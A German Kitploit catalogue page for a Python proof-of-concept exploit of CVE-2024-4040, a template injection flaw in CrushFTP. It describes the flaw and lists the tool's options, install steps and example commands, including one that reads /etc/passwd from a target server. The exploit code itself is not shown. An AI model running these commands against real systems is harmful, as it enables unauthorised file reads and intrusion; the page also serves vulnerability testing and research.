Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/1ncendium/cve-2024-4040
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHub1ncendium/cve-2024-4040

CVE-2024-4040

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Eine serverseitige Template-Injection-Schwachstelle in CrushFTP in allen Versionen vor 10.7.1 und 11.1.0 auf allen Plattformen ermöglicht es nicht authentifizierten Angreifern, Dateien aus dem Dateisystem außerhalb der VFS-Sandbox zu lesen, die Authentifizierung zu umgehen, um administrative Zugriffe zu erlangen, und Remote-Code-Ausführung auf dem Server durchzuführen.

vor 2 JahrenNoch nicht geprüft
Teilen

CVE-2024-4040 PoC

Python Exploit für CVE-2024-4040

Beschreibung

Eine Server-Side-Template-Injection-Schwachstelle in CrushFTP in allen Versionen vor 10.7.1 und 11.1.0 auf allen Plattformen ermöglicht es nicht authentifizierten Remote-Angreifern, Dateien außerhalb des VFS-Sandbox-Dateisystems zu lesen, die Authentifizierung zu umgehen, um administrativen Zugriff zu erlangen, und Remote-Code-Ausführung auf dem Server durchzuführen.

Optionen

root@kitploit:~
-h  --help               Show this screen.
-t  --target             Specify target URL
-f  --file               Specify file to include

Beispiele

root@kitploit:~
Only test if vulnerable:     exploit.py -t http://10.10.1.23:8080
Include /etc/passwd:         exploit.py -t http://10.10.1.23:8080 -f /etc/passwd

Anforderungen

  • Python3

Installation

root@kitploit:~
git clone https://github.com/1ncendium/CVE-2024-4040.git
cd CVE-2024-4040
python3 exploit.py -t http://target:8080
Tool herunterladen